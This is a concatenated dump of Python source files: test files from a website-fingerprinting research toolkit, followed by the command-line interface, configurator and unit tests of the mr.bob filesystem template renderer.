data['trace'] = [Packet(*pkt) for pkt in data['trace']]
return cls(**data)
```
#### File: classifiers/kfingerprinting/test_metrics.py
```python
import pytest
from lab.classifiers.kfingerprinting import make_binary, false_positive_rate
@pytest.mark.parametrize('strict', [True, False])
def test_make_binary_simple(strict: bool):
"""It should convert unmonitored labels to -1 and monitored to 1."""
binary_true, binary_pred = make_binary(
y_true=['google.com', 'facebook.com', 'background'],
y_pred=['google.com', 'facebook.com', 'background'],
neg_label='background', strict=strict)
assert binary_true == binary_pred == [1, 1, -1]
def test_make_binary_no_strict():
"""It should treat each monitored page as equivalent."""
binary_true, binary_pred = make_binary(
y_true=['facebook.com', 'background', 'mail.google.com'],
y_pred=['facebook.com', 'background', 'pintrest.com'],
neg_label='background', strict=False)
assert binary_true == binary_pred == [1, -1, 1]
def test_make_binary_strict():
"""It should require predictions for monitored pages to be precise."""
binary_true, binary_pred = make_binary(
y_true=['facebook.com', 'background', 'mail.google.com', 'background'],
y_pred=['facebook.com', 'background', 'pintrest.com', 'google.com'],
neg_label='background', strict=True)
assert binary_true == [1, -1, 1, -1]
assert binary_pred == [1, -1, -1, 1]
def test_false_positive_rate():
"""It should correctly report the false positive rate."""
rate = false_positive_rate(y_true=[1, 1, -1, -1, -1, -1, -1],
y_pred=[1, -1, -1, 1, 1, -1, 1])
assert rate == 0.6
```
#### File: wf-tools/tests/test_fetch_checkpoint.py
```python
from collections import Counter
from lab.fetch_websites import filter_by_checkpoint, Result
def test_empty():
"""It should return the full sequence for no checkpoint."""
counter = {'Q043': 10, 'tcp': 20}
assert filter_by_checkpoint(
urls=['https://google.com', 'https://example.com'], checkpoint=[],
counter=counter
) == {
'https://google.com': counter.copy(),
'https://example.com': counter.copy()
}
counter = {'Q043': 1, 'tcp': 1}
assert filter_by_checkpoint(
urls=['https://mail.com', 'https://pie.com'], checkpoint=[],
counter=counter
) == {'https://mail.com': counter.copy(), 'https://pie.com': counter.copy()}
def make_result(**kwargs) -> Result:
"""Make a result with the provided keys and defaults for others.
"""
defaults: Result = {
'url': '', 'protocol': '', 'page_source': None, 'final_url': None,
'status': 'success', 'http_trace': [], 'packets': b''
}
defaults.update(kwargs) # type: ignore
return defaults
def test_existing_result():
"""It should filter out any results that already exist."""
urls = ['https://google.com', 'https://example.com']
counter = Counter({'Q043': 10, 'tcp': 20})
result = filter_by_checkpoint(urls=urls, counter=counter, checkpoint=[
make_result(url='https://google.com', protocol='tcp', status='success'),
make_result(url='https://example.com', protocol='Q043',
status='success')
])
assert result == {'https://google.com': (counter - Counter(tcp=1)),
'https://example.com': (counter - Counter(Q043=1))}
def test_no_negative_returns():
"""It should not return negative values."""
urls = ['https://google.com', 'https://example.com']
counter = Counter({'Q043': 1, 'tcp': 1})
result = filter_by_checkpoint(urls=urls, counter=counter, checkpoint=[
make_result(url='https://google.com', protocol='tcp', status='success'),
make_result(url='https://google.com', protocol='tcp', status='success')
])
assert result == {'https://google.com': Counter(Q043=1),
'https://example.com': counter.copy()}
def test_no_empty_returns():
"""It should not return urls that have no more protocols."""
urls = ['https://google.com', 'https://example.com']
counter = Counter({'Q043': 1, 'tcp': 1})
result = filter_by_checkpoint(urls=urls, counter=counter, checkpoint=[
make_result(url='https://google.com', protocol='tcp', status='success'),
make_result(url='https://google.com', protocol='Q043', status='success')
])
assert result == {'https://example.com': counter.copy()}
def test_check_sequential_failures():
"""If a url failed n times sequentially in the checkpoint,
it should not be returned.
"""
urls = ['https://a.com', 'https://b.com']
counter = Counter({'Q043': 1, 'tcp': 1})
result = filter_by_checkpoint(urls=urls, counter=counter, checkpoint=[
make_result(url='https://a.com', protocol='tcp', status='success'),
make_result(url='https://a.com', protocol='Q043', status='failure'),
make_result(url='https://a.com', protocol='Q043', status='timeout'),
make_result(url='https://a.com', protocol='Q043', status='failure')
], max_attempts=3)
assert result == {'https://b.com': counter.copy()}
def test_non_sequential_failures():
"""If a url failed n times non-sequentially in the checkpoint,
it is okay.
"""
urls = ['https://a.com', 'https://b.com']
counter = Counter({'Q043': 3, 'tcp': 3})
result = filter_by_checkpoint(urls=urls, counter=counter, checkpoint=[
make_result(url='https://a.com', protocol='tcp', status='success'),
make_result(url='https://a.com', protocol='Q043', status='failure'),
make_result(url='https://a.com', protocol='Q043', status='success'),
make_result(url='https://a.com', protocol='Q043', status='failure'),
make_result(url='https://a.com', protocol='Q043', status='success'),
make_result(url='https://a.com', protocol='Q043', status='failure')
], max_attempts=3)
assert result == {'https://a.com': (counter - Counter(tcp=1, Q043=2)),
'https://b.com': counter.copy()}
def test_no_success_max_failures():
"""It should correctly handle items which have only ever failed."""
checkpoint = [
make_result(url="https://www.a.com", protocol="Q043", status="failure"),
make_result(url="https://www.a.com", protocol="Q043", status="failure"),
make_result(url="https://www.a.com", protocol="Q043", status="failure"),
]
urls = ["https://www.a.com"]
version_ctr: Counter = Counter(Q043=1, Q046=1)
assert filter_by_checkpoint(urls, checkpoint, version_ctr) == Counter()
``` |
{
"source": "jpcw/mr.bob",
"score": 3
} |
#### File: mr.bob/mrbob/cli.py
```python
import pkg_resources
import sys
import os
import shutil
import six
import argparse
from .configurator import Configurator
from .configurator import maybe_bool
from .bobexceptions import ConfigurationError
from .bobexceptions import TemplateConfigurationError
from .parsing import parse_config, update_config, pretty_format_config
# http://docs.python.org/library/argparse.html
parser = argparse.ArgumentParser(description='Filesystem template renderer')
parser.add_argument('template',
nargs="?",
help="""Template name to use for rendering. See
http://mrbob.readthedocs.org/en/latest/userguide.html#usage
for a guide to template syntax
""")
parser.add_argument('-O', '--target-directory',
default=".",
dest="target_directory",
help='Where to output rendered structure. Defaults to current directory')
parser.add_argument('-v', '--verbose',
action="store_true",
default=False,
help='Print more output for debugging')
parser.add_argument('-c', '--config',
action="store",
help='Configuration file to specify either [mr.bob] or [variables] sections')
parser.add_argument('-V', '--version',
action="store_true",
default=False,
help='Display version number')
parser.add_argument('-l', '--list-questions',
action="store_true",
default=False,
help='List all questions needed for the template')
parser.add_argument('-w', '--remember-answers',
action="store_true",
default=False,
help='Remember answers to .mrbob.ini file inside output directory')
parser.add_argument('-n', '--non-interactive',
dest='non_interactive',
action='store_true',
default=False,
help="Don't prompt for input. Fail if questions are required but not answered")
parser.add_argument('-q', '--quiet',
action="store_true",
default=False,
help='Suppress all but necessary output')
def main(args=sys.argv[1:]):
"""Main function called by `mrbob` command.
"""
options = parser.parse_args(args=args)
if options.version:
version = pkg_resources.get_distribution('mr.bob').version
return version
if not options.template:
parser.error('You must specify what template to use.')
userconfig = os.path.expanduser('~/.mrbob')
if os.path.exists(userconfig):
global_config = parse_config(userconfig)
global_bobconfig = global_config['mr.bob']
global_variables = global_config['variables']
global_defaults = global_config['defaults']
else:
global_bobconfig = {}
global_variables = {}
global_defaults = {}
original_global_bobconfig = dict(global_bobconfig)
original_global_variables = dict(global_variables)
original_global_defaults = dict(global_defaults)
if options.config:
try:
file_config = parse_config(options.config)
except ConfigurationError as e:
parser.error(e)
file_bobconfig = file_config['mr.bob']
file_variables = file_config['variables']
file_defaults = file_config['defaults']
else:
file_bobconfig = {}
file_variables = {}
file_defaults = {}
cli_variables = {} # TODO: implement variables on cli
cli_defaults = {} # TODO: implement defaults on cli
cli_bobconfig = {
'verbose': options.verbose,
'quiet': options.quiet,
'remember_answers': options.remember_answers,
'non_interactive': options.non_interactive,
}
bobconfig = update_config(update_config(global_bobconfig, file_bobconfig), cli_bobconfig)
variables = update_config(update_config(global_variables, file_variables), cli_variables)
defaults = update_config(update_config(global_defaults, file_defaults), cli_defaults)
c = None
if bobconfig['verbose']:
print('')
print('Configuration provided:')
print('')
print('[variables] from ~/.mrbob')
for line in pretty_format_config(original_global_variables):
print(line)
print('[variables] from --config file')
for line in pretty_format_config(file_variables):
print(line)
# TODO: implement variables on cli
# print('[variables] from command line interface')
# for line in pretty_format_config(file_variables):
# print(line)
print('[defaults] from ~/.mrbob')
for line in pretty_format_config(original_global_defaults):
print(line)
print('[defaults] from --config file')
for line in pretty_format_config(file_defaults):
print(line)
# TODO: implement defaults on cli
# print('[defaults] from command line interface')
# for line in pretty_format_config(file_defaults):
# print(line)
print('[mr.bob] from ~/.mrbob')
for line in pretty_format_config(original_global_bobconfig):
print(line)
print('[mr.bob] from --config file')
for line in pretty_format_config(file_bobconfig):
print(line)
print('[mr.bob] from command line interface')
for line in pretty_format_config(cli_bobconfig):
print(line)
try:
c = Configurator(template=options.template,
target_directory=options.target_directory,
bobconfig=bobconfig,
variables=variables,
defaults=defaults)
if options.list_questions:
return c.print_questions()
if c.questions and not maybe_bool(bobconfig['quiet']):
if options.non_interactive:
print('')
print('Welcome to mr.bob non-interactive mode. Questions will be answered by default values or hooks.')
print('')
else:
print('')
print('Welcome to mr.bob interactive mode. Before we generate directory structure, some questions need to be answered.')
print('')
print('Answer with a question mark to display help.')
print('Values in square brackets at the end of the questions show the default value if there is no answer.')
print('\n')
c.ask_questions()
if not options.non_interactive:
print('')
c.render()
if not maybe_bool(bobconfig['quiet']):
print("Generated file structure at %s" % os.path.realpath(options.target_directory))
print('')
return
except TemplateConfigurationError as e:
parser.error(six.u('TemplateConfigurationError: %s') % e.args[0])
except ConfigurationError as e:
parser.error(six.u('ConfigurationError: %s') % e.args[0])
finally:
if c and c.is_tempdir:
shutil.rmtree(c.template_dir)
if __name__ == '__main__': # pragma: nocover
print(main())
```
#### File: mr.bob/mrbob/configurator.py
```python
import os
import re
import sys
import readline
try: # pragma: no cover
from urllib import urlretrieve # NOQA
except ImportError: # pragma: no cover
# PY3K
from urllib.request import urlretrieve # NOQA
import tempfile
from zipfile import ZipFile, is_zipfile
readline # make pyflakes happy, readline makes interactive mode keep history
import six
from importlib import import_module
from .rendering import render_structure
from .parsing import (
parse_config,
write_config,
update_config,
pretty_format_config,
)
from .bobexceptions import (
ConfigurationError,
TemplateConfigurationError,
SkipQuestion,
ValidationError,
)
DOTTED_REGEX = re.compile(r'^[a-zA-Z_.]+:[a-zA-Z_.]+$')
def resolve_dotted_path(name):
module_name, dir_name = name.rsplit(':', 1)
module = import_module(module_name)
return os.path.join(os.path.dirname(module.__file__), dir_name)
def resolve_dotted_func(name):
module_name, func_name = name.split(':')
module = import_module(module_name)
func = getattr(module, func_name, None)
if func:
return func
else:
raise ConfigurationError("There is no object named %s in module %s" % (func_name, module_name))
def maybe_resolve_dotted_func(name):
if isinstance(name, six.string_types) and DOTTED_REGEX.match(name):
return resolve_dotted_func(name)
else:
return name
def maybe_bool(value):
if value == "True":
return True
if value == "False":
return False
else:
return value
def parse_template(template_name):
"""Resolve template name into absolute path to the template
and boolean if absolute path is temporary directory.
"""
if template_name.startswith('http'):
if '#' in template_name:
url, subpath = template_name.rsplit('#', 1)
else:
url = template_name
subpath = ''
with tempfile.NamedTemporaryFile() as tmpfile:
urlretrieve(url, tmpfile.name)
if not is_zipfile(tmpfile.name):
raise ConfigurationError("Not a zip file: %s" % tmpfile)
zf = ZipFile(tmpfile)
try:
path = tempfile.mkdtemp()
zf.extractall(path)
return os.path.join(path, subpath), True
finally:
zf.close()
if ':' in template_name:
path = resolve_dotted_path(template_name)
else:
path = os.path.realpath(template_name)
if not os.path.isdir(path):
raise ConfigurationError('Template directory does not exist: %s' % path)
return path, False
class Configurator(object):
"""Controller that figures out settings, asks questions and renders
the directory structure.
:param template: Template name
:param target_directory: Filesystem path to a output directory
:param bobconfig: Configuration for mr.bob behaviour
:param variables: Given variables to questions
:param defaults: Overriden defaults of the questions
Additional to above settings, `Configurator` exposes following attributes:
- :attr:`template_dir` is root directory of the template
- :attr:`is_tempdir` if template directory is temporary (when using zipfile)
- :attr:`templateconfig` dictionary parsed from `template` section
- :attr:`questions` ordered list of `Question instances to be asked
- :attr:`bobconfig` dictionary parsed from `mrbob` section of the config
"""
def __init__(self,
template,
target_directory,
bobconfig=None,
variables=None,
defaults=None):
if not bobconfig:
bobconfig = {}
if not variables:
variables = {}
if not defaults:
defaults = {}
self.variables = variables
self.defaults = defaults
self.target_directory = os.path.realpath(target_directory)
# figure out template directory
self.template_dir, self.is_tempdir = parse_template(template)
# check if user is trying to specify output dir into template dir
if self.template_dir in os.path.commonprefix([self.target_directory,
self.template_dir]):
raise ConfigurationError('You can not use target directory inside the template')
if not os.path.isdir(self.target_directory):
os.makedirs(self.target_directory)
# parse template configuration file
template_config = os.path.join(self.template_dir, '.mrbob.ini')
if not os.path.exists(template_config):
raise TemplateConfigurationError('Config not found: %s' % template_config)
self.config = parse_config(template_config)
# parse questions from template configuration file
self.raw_questions = self.config['questions']
if self.raw_questions:
self.questions = self.parse_questions(self.raw_questions, self.config['questions_order'])
else:
self.questions = []
# parse bobconfig settings
# TODO: move config resolution inside this function from cli.py
self.bobconfig = update_config(bobconfig, self.config['mr.bob'])
self.verbose = maybe_bool(self.bobconfig.get('verbose', False))
self.quiet = maybe_bool(self.bobconfig.get('quiet', False))
self.remember_answers = maybe_bool(self.bobconfig.get('remember_answers', False))
self.ignored_files = self.bobconfig.get('ignored_files', '').split()
self.ignored_directories = self.bobconfig.get('ignored_directories', '').split()
# parse template settings
self.templateconfig = self.config['template']
self.post_render = [resolve_dotted_func(f) for f in self.templateconfig.get('post_render', '').split()]
self.pre_render = [resolve_dotted_func(f) for f in self.templateconfig.get('pre_render', '').split()]
self.renderer = resolve_dotted_func(
self.templateconfig.get('renderer', 'mrbob.rendering:jinja2_renderer'))
def render(self):
"""Render file structure given instance configuration. Basically calls
:func:`mrbob.rendering.render_structure`.
"""
if self.pre_render:
for f in self.pre_render:
f(self)
render_structure(self.template_dir,
self.target_directory,
self.variables,
self.verbose,
self.renderer,
self.ignored_files,
self.ignored_directories)
if self.remember_answers:
write_config(os.path.join(self.target_directory, '.mrbob.ini'),
'variables',
self.variables)
if self.post_render:
for f in self.post_render:
f(self)
def parse_questions(self, config, order):
q = []
for question_key in order:
key_parts = question_key.split('.')
c = dict(config)
for k in key_parts:
c = c[k]
# filter out subnamespaces
c = dict([(k, v) for k, v in c.items() if not isinstance(v, dict)])
question = Question(name=question_key, **c)
q.append(question)
return q
def print_questions(self): # pragma: no cover
for line in pretty_format_config(self.raw_questions):
print(line)
# TODO: filter out lines without questions
# TODO: seperate questions with a newline
# TODO: keep order
def ask_questions(self):
"""Loops through questions and asks for input if variable is not yet set.
"""
# TODO: if users want to manipulate questions order, this is curently not possible.
for question in self.questions:
if question.name not in self.variables:
self.variables[question.name] = question.ask(self)
class Question(object):
"""Question configuration. Parameters are used to configure questioning
and possible validation of the answer.
:param name: Unique, namespaced name of the question
:param question: Question to be asked
:param default: Default value of the question
:param required: Is question required?
:type required: bool
:param command_prompt: Function to executed to ask the question given question text
:param help: Optional help message
:param pre_ask_question: Space limited functions in dotted notation to ask before the question is asked
:param post_ask_question: Space limited functions in dotted notation to ask aster the question is asked
:param **extra: Any extra parameters stored for possible extending of `Question` functionality
Any of above parameters can be accessed as an attribute of `Question` instance.
"""
def __init__(self,
name,
question,
default=None,
required=False,
command_prompt=six.moves.input,
pre_ask_question='',
post_ask_question='',
help="",
**extra):
self.name = name
self.question = question
self.default = default
self.required = maybe_bool(required)
self.command_prompt = maybe_resolve_dotted_func(command_prompt)
self.help = help
self.pre_ask_question = [resolve_dotted_func(f) for f in pre_ask_question.split()]
self.post_ask_question = [resolve_dotted_func(f) for f in post_ask_question.split()]
self.extra = extra
def __repr__(self):
return six.u("<Question name=%(name)s question='%(question)s'"
" default=%(default)s required=%(required)s>") % self.__dict__
def ask(self, configurator):
"""Eventually, ask the question.
:param configurator: :class:`mrbob.configurator.Configurator` instance
"""
correct_answer = None
self.default = configurator.defaults.get(self.name, self.default)
non_interactive = maybe_bool(configurator.bobconfig.get('non_interactive', False))
if non_interactive:
self.command_prompt = lambda x: ''
try:
while correct_answer is None:
# hook: pre ask question
for f in self.pre_ask_question:
try:
f(configurator, self)
except SkipQuestion:
return
# prepare question
if self.default:
question = six.u("--> %s [%s]: ") % (self.question, self.default)
else:
question = six.u("--> %s: ") % self.question
# ask question
if six.PY3: # pragma: no cover
answer = self.command_prompt(question).strip()
else: # pragma: no cover
answer = self.command_prompt(question.encode('utf-8')).strip().decode('utf-8')
# display additional help
if answer == "?":
if self.help:
print(self.help)
else:
print("There is no additional help text.")
continue
if answer:
correct_answer = answer
# if we don't have an answer, take default
elif self.default is not None:
correct_answer = maybe_bool(self.default)
# if we don't have an answer or default value and is required, reask
elif self.required and not correct_answer:
if non_interactive:
raise ConfigurationError('non-interactive mode: question %s is required but not answered.' % self.name)
else:
# TODO: we don't cover this as coverage seems to ignore it
continue # pragma: no cover
else:
correct_answer = answer
# hook: post ask question + validation
for f in self.post_ask_question:
try:
correct_answer = f(configurator, self, correct_answer)
except ValidationError as e:
if non_interactive:
raise ConfigurationError('non-interactive mode: question %s failed validation.' % self.name)
else:
correct_answer = None
print("ERROR: " + str(e))
continue
except KeyboardInterrupt: # pragma: no cover
print('\nExiting...')
sys.exit(0)
if not non_interactive:
print('')
return correct_answer
```
#### File: mrbob/tests/test_configurator.py
```python
import unittest
import os
import sys
import tempfile
import shutil
import six
import mock
mocked_pre_ask_question = mock.Mock()
mocked_post_ask_question = mock.Mock()
mocked_post_ask_question_validationerror = mock.Mock()
mocked_post_ask_question_validationerror_non_interactive = mock.Mock()
mocked_render_hook = mock.Mock()
def dummy_prompt(value): # pragma: no cover
pass
def dummy_renderer(value): # pragma: no cover
pass
def dummy_question_hook(configurator, question): # pragma: no cover
return
def dummy_question_hook2(configurator, question): # pragma: no cover
return
def dummy_render_hook(configurator): # pragma: no cover
return
def dummy_question_hook_skipquestion(configurator, question): # pragma: no cover
from ..bobexceptions import SkipQuestion
raise SkipQuestion
class DummyConfigurator(object):
def __init__(self,
defaults=None,
bobconfig=None,
templateconfig=None,
variables=None,
quiet=False):
self.defaults = defaults or {}
self.bobconfig = bobconfig or {}
self.variables = variables or {}
self.quiet = quiet
self.templateconfig = templateconfig or {}
class resolve_dotted_pathTest(unittest.TestCase):
def call_FUT(self, name):
from ..configurator import resolve_dotted_path
return resolve_dotted_path(name)
def test_nomodule(self):
self.assertRaises(ImportError, self.call_FUT, 'foobar.blabla:foo')
def test_return_abs_path(self):
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
abs_path = self.call_FUT('mrbob.tests:templates')
self.assertEquals(abs_path, template_dir)
class resolve_dotted_funcTest(unittest.TestCase):
def call_FUT(self, name):
from ..configurator import resolve_dotted_func
return resolve_dotted_func(name)
def test_nomodule(self):
self.assertRaises(ImportError, self.call_FUT, 'foobar.blabla:foo')
def test_error_no_func(self):
from ..bobexceptions import ConfigurationError
self.assertRaises(ConfigurationError, self.call_FUT, 'mrbob.rendering:foo')
def test_return_func(self):
from mrbob.rendering import jinja2_renderer
func = self.call_FUT('mrbob.rendering:jinja2_renderer')
self.assertEquals(func, jinja2_renderer)
class parse_templateTest(unittest.TestCase):
def call_FUT(self, name):
from ..configurator import parse_template
return parse_template(name)
def test_relative(self):
old_cwd = os.getcwd()
os.chdir(os.path.dirname(__file__))
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
abs_path = self.call_FUT('templates')
os.chdir(old_cwd)
self.assertEqual(abs_path, (template_dir, False))
def test_absolute(self):
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
abs_path = self.call_FUT(template_dir)
self.assertEqual(abs_path, (template_dir, False))
def test_dotted(self):
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
abs_path = self.call_FUT('mrbob.tests:templates')
self.assertEqual(abs_path, (template_dir, False))
def test_not_a_dir(self):
from ..bobexceptions import ConfigurationError
self.assertRaises(ConfigurationError, self.call_FUT, 'foo_bar')
@mock.patch('mrbob.configurator.urlretrieve')
def test_zipfile(self, mock_urlretrieve):
mock_urlretrieve.side_effect = self.fake_zip
abs_path = self.call_FUT('http://foobar.com/bla.zip')
self.assertEqual(set(os.listdir(abs_path[0])),
set(['test', '.mrbob.ini']))
@mock.patch('mrbob.configurator.urlretrieve')
def test_zipfile_base_path(self, mock_urlretrieve):
mock_urlretrieve.side_effect = self.fake_zip_base_path
abs_path = self.call_FUT('http://foobar.com/bla.zip#some/dir')
self.assertEqual(set(os.listdir(abs_path[0])),
set(['test', '.mrbob.ini']))
@mock.patch('mrbob.configurator.urlretrieve')
def test_zipfile_not_zipfile(self, mock_urlretrieve):
from ..bobexceptions import ConfigurationError
mock_urlretrieve.side_effect = self.fake_wrong_zip
self.assertRaises(ConfigurationError, self.call_FUT, 'http://foobar.com/bla.tar#some/dir')
def fake_wrong_zip(self, url, path):
with open(path, 'w') as f:
f.write('boo')
def fake_zip(self, url, path):
import zipfile
zf = zipfile.ZipFile(path, 'w')
try:
zf.writestr('.mrbob.ini', '[questions]\n')
zf.writestr('test', 'test')
finally:
zf.close()
def fake_zip_base_path(self, url, path):
import zipfile
zf = zipfile.ZipFile(path, 'w')
try:
zf.writestr('some/dir/.mrbob.ini', '[questions]\n')
zf.writestr('some/dir/test', 'test')
finally:
zf.close()
class ConfiguratorTest(unittest.TestCase):
def setUp(self):
self.target_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.target_dir)
def call_FUT(self, *args, **kw):
from ..configurator import Configurator
return Configurator(*args, **kw)
def test_target_directory_inside_template_dir(self):
from ..bobexceptions import ConfigurationError
self.assertRaises(ConfigurationError,
self.call_FUT,
'mrbob.tests:templates/questions1',
os.path.join(os.path.dirname(__file__), 'templates/questions1/foo'),
{})
def test_parse_questions_basic(self):
c = self.call_FUT('mrbob.tests:templates/questions1',
self.target_dir,
{})
self.assertEqual(len(c.questions), 2)
self.assertEqual(c.questions[0].name, 'foo.bar.car.dar')
self.assertEqual(c.questions[0].question, 'Why?')
self.assertEqual(c.questions[1].name, 'foo')
self.assertEqual(c.questions[1].question, 'What?')
def test_parse_questions_no_questions(self):
c = self.call_FUT('mrbob.tests:templates/questions2',
self.target_dir,
{})
self.assertEqual(len(c.questions), 0)
def test_parse_questions_no_questions_section(self):
self.call_FUT('mrbob.tests:templates/empty2',
self.target_dir,
{})
def test_parse_questions_extra_parameter(self):
c = self.call_FUT(
'mrbob.tests:templates/questions3',
self.target_dir,
{})
self.assertEqual(c.questions[0].extra, {'foobar': 'something'})
def test_parse_questions_all(self):
c = self.call_FUT('mrbob.tests:templates/questions4',
self.target_dir,
{})
self.assertEqual(len(c.questions), 1)
self.assertEqual(c.questions[0].name, six.u('foo'))
self.assertEqual(c.questions[0].default, "True")
self.assertEqual(c.questions[0].required, False)
self.assertEqual(c.questions[0].help, six.u('Blabla blabal balasd a a sd'))
self.assertEqual(c.questions[0].command_prompt, dummy_prompt)
def test_ask_questions_empty(self):
args = ['mrbob.tests:templates/questions1',
self.target_dir,
{}]
c = self.call_FUT(*args)
c.questions = []
c.variables = {}
c.ask_questions()
self.assertEquals(c.variables, {})
def test_ask_questions_missing(self):
from ..configurator import Question
args = ['mrbob.tests:templates/questions1',
self.target_dir,
{}]
c = self.call_FUT(*args)
c.questions = [Question('foo.bar', 'fobar?'), Question('moo', "Moo?", command_prompt=lambda x: 'moo.')]
c.variables = {'foo.bar': 'answer'}
c.ask_questions()
self.assertEquals(c.variables, {'foo.bar': 'answer', 'moo': 'moo.'})
@mock.patch('mrbob.configurator.render_structure')
def test_remember_answers(self, mock_render_structure):
args = ['mrbob.tests:templates/questions1',
self.target_dir,
{'remember_answers': 'True'},
{'foo.bar': '3'}]
c = self.call_FUT(*args)
c.render()
with open(os.path.join(self.target_dir, '.mrbob.ini')) as f:
self.assertEquals(f.read().strip(), """[variables]\nfoo.bar = 3""".strip())
@mock.patch('mrbob.configurator.render_structure')
def test_remember_answers_default(self, mock_render_structure):
c = self.call_FUT(
'mrbob.tests:templates/questions1',
self.target_dir,
variables={'foo.bar': '3'},
)
c.render()
self.assertFalse(os.path.exists(os.path.join(self.target_dir, '.mrbob.ini')))
def test_renderer_default(self):
from ..rendering import jinja2_renderer
c = self.call_FUT('mrbob.tests:templates/empty',
self.target_dir,
{})
self.assertEqual(c.renderer, jinja2_renderer)
def test_renderer_set(self):
c = self.call_FUT('mrbob.tests:templates/renderer',
self.target_dir,
{})
self.assertEqual(c.renderer, dummy_renderer)
def test_pre_post_render_hooks_multiple(self):
c = self.call_FUT(
'mrbob.tests:templates/render_hooks',
self.target_dir,
{},
)
self.assertEqual(c.pre_render, [dummy_render_hook, mocked_render_hook])
self.assertEqual(c.post_render, [dummy_render_hook, mocked_render_hook])
c.render()
self.assertEqual(mocked_render_hook.mock_calls, [mock.call(c), mock.call(c)])
def test_ignored_files(self):
c = self.call_FUT('mrbob.tests:templates/ignored',
self.target_dir,
{})
self.assertEqual(len(c.ignored_files), 2)
self.assertTrue('ignored' in c.ignored_files)
self.assertTrue('*.txt' in c.ignored_files)
def test_ignored_directories(self):
c = self.call_FUT('mrbob.tests:templates/ignored_dirs',
self.target_dir,
{})
self.assertEqual(len(c.ignored_directories), 2)
self.assertTrue('ignored' in c.ignored_directories)
self.assertTrue('*_stuff' in c.ignored_directories)
class QuestionTest(unittest.TestCase):
def call_FUT(self, *args, **kw):
from ..configurator import Question
return Question(*args, **kw)
def test_defaults(self):
from six import moves
q = self.call_FUT('foo', 'Why?')
self.assertEqual(q.name, 'foo')
self.assertEqual(q.default, None)
self.assertEqual(q.required, False)
self.assertEqual(q.help, "")
self.assertEqual(q.command_prompt, moves.input)
def test_repr(self):
q = self.call_FUT('foo', 'Why?')
self.assertEqual(repr(q), six.u("<Question name=foo question='Why?' default=None required=False>"))
def test_ask(self):
def cmd(q):
self.assertEqual(q, '--> Why?: ')
return 'foo'
q = self.call_FUT('foo', 'Why?', command_prompt=cmd)
answer = q.ask(DummyConfigurator())
self.assertEqual(answer, 'foo')
def test_ask_unicode(self):
def cmd(q):
self.assertTrue(isinstance(q, str))
return 'foo'
q = self.call_FUT('foo', six.u('č?'), command_prompt=cmd)
q.ask(DummyConfigurator())
def test_ask_default_empty(self):
q = self.call_FUT('foo',
'Why?',
default="moo",
command_prompt=lambda x: '')
answer = q.ask(DummyConfigurator())
self.assertEqual(answer, 'moo')
def test_ask_default_not_empty(self):
def cmd(q):
self.assertEqual(q, '--> Why? [moo]: ')
return 'foo'
q = self.call_FUT('foo',
'Why?',
default="moo",
command_prompt=cmd)
answer = q.ask(DummyConfigurator())
self.assertEqual(answer, 'foo')
def test_ask_no_default_and_not_required(self):
def cmd(q, go=['foo', '']):
return go.pop()
q = self.call_FUT('foo',
'Why?',
command_prompt=cmd)
answer = q.ask(DummyConfigurator())
self.assertEqual(answer, '')
def test_ask_no_default_and_required(self):
def cmd(q, go=['foo', '']):
return go.pop()
q = self.call_FUT('foo',
'Why?',
required=True,
command_prompt=cmd)
answer = q.ask(DummyConfigurator())
self.assertEqual(answer, 'foo')
def test_ask_no_help(self):
from six import StringIO
def cmd(q, go=['foo', '?']):
return go.pop()
sys.stdout = StringIO()
q = self.call_FUT('foo',
'Why?',
command_prompt=cmd)
q.ask(DummyConfigurator())
self.assertEqual(sys.stdout.getvalue(), 'There is no additional help text.\n\n')
sys.stdout = sys.__stdout__
def test_ask_help(self):
from six import StringIO
def cmd(q, go=['foo', '?']):
return go.pop()
sys.stdout = StringIO()
q = self.call_FUT('foo',
'Why?',
help="foobar_help",
command_prompt=cmd)
q.ask(DummyConfigurator())
self.assertEqual(sys.stdout.getvalue(), 'foobar_help\n\n')
sys.stdout = sys.__stdout__
def test_non_interactive_required(self):
from ..bobexceptions import ConfigurationError
q = self.call_FUT('foo', 'Why?', required=True)
c = DummyConfigurator(bobconfig={'non_interactive': 'True'})
self.assertRaises(ConfigurationError, q.ask, c)
def test_non_interactive_not_required(self):
q = self.call_FUT('foo', 'Why?')
c = DummyConfigurator(bobconfig={'non_interactive': 'True'})
answer = q.ask(c)
self.assertEquals(answer, '')
def test_defaults_override(self):
q = self.call_FUT('foo', 'Why?', default="foo")
c = DummyConfigurator(bobconfig={'non_interactive': 'True'},
defaults={'foo': 'moo'})
answer = q.ask(c)
self.assertEquals(answer, 'moo')
def test_pre_ask_question(self):
q = self.call_FUT('foo',
'Why?',
command_prompt=lambda x: '',
pre_ask_question="mrbob.tests.test_configurator:mocked_pre_ask_question")
c = DummyConfigurator()
q.ask(c)
mocked_pre_ask_question.assert_called_with(c, q)
def test_pre_ask_question_multiple(self):
q = self.call_FUT('foo', 'Why?', pre_ask_question="mrbob.tests.test_configurator:dummy_question_hook mrbob.tests.test_configurator:dummy_question_hook2")
self.assertEqual(q.pre_ask_question, [dummy_question_hook, dummy_question_hook2])
def test_pre_ask_question_skipquestion(self):
q = self.call_FUT('foo', 'Why?', pre_ask_question="mrbob.tests.test_configurator:dummy_question_hook_skipquestion")
self.assertEquals(q.ask(DummyConfigurator()), None)
def test_post_ask_question(self):
q = self.call_FUT('foo',
'Why?',
command_prompt=lambda x: '',
post_ask_question="mrbob.tests.test_configurator:mocked_post_ask_question")
c = DummyConfigurator()
answer = q.ask(c)
mocked_post_ask_question.assert_called_with(c, q, '')
self.assertEquals(mocked_post_ask_question(), answer)
def test_post_ask_question_multiple(self):
q = self.call_FUT('foo',
'Why?',
post_ask_question="mrbob.tests.test_configurator:dummy_question_hook mrbob.tests.test_configurator:dummy_question_hook2")
self.assertEqual(q.post_ask_question,
[dummy_question_hook, dummy_question_hook2])
def test_post_ask_question_validationerror(self):
def cmd(q, go=['bar', 'foo']):
return go.pop()
def side_effect(configurator, question, answer):
from ..bobexceptions import ValidationError
if answer == 'foo':
raise ValidationError
elif answer == 'bar':
return 'moo'
mocked_post_ask_question_validationerror.side_effect = side_effect
q = self.call_FUT('foo',
'Why?',
command_prompt=cmd,
post_ask_question="mrbob.tests.test_configurator:mocked_post_ask_question_validationerror")
c = DummyConfigurator()
self.assertEqual(q.ask(c), 'moo')
